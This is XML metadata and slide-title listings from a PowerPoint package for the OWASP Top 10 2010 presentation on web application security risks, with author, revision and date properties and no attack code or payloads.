<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/03/2010" val="LastModifi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42587</TotalTime>
  <Words>6931</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1015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About OWASP</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Release Notes</vt:lpstr>
      <vt:lpstr>Application Security Risks</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Application Security Risks – 2010 </vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Security Misconfiguration</vt:lpstr>
      <vt:lpstr>Insecure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>Failure to Restrict URL Access</vt:lpstr>
      <vt:lpstr>Insufficient Transport Layer Protection</vt:lpstr>
      <vt:lpstr>Unvalidated Redirects and Forwards</vt:lpstr>
      <vt:lpstr>What’s Next for Developers</vt:lpstr>
      <vt:lpstr>What’s Next for Verifiers</vt:lpstr>
      <vt:lpstr>What’s Next for Organizations</vt:lpstr>
      <vt:lpstr>Notes About Risk</vt:lpstr>
      <vt:lpstr>Details About Risk Factors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10 - 2010</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Dave Wichers</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <cp:lastModifiedBy>Dave Wichers</cp:lastModifiedBy>
  <cp:revision>510</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-01-27T22:28:32Z</dcterms:modified>
  <cp:contentStatus>FINAL</cp:contentStatus>
</cp:coreProperties>
</file>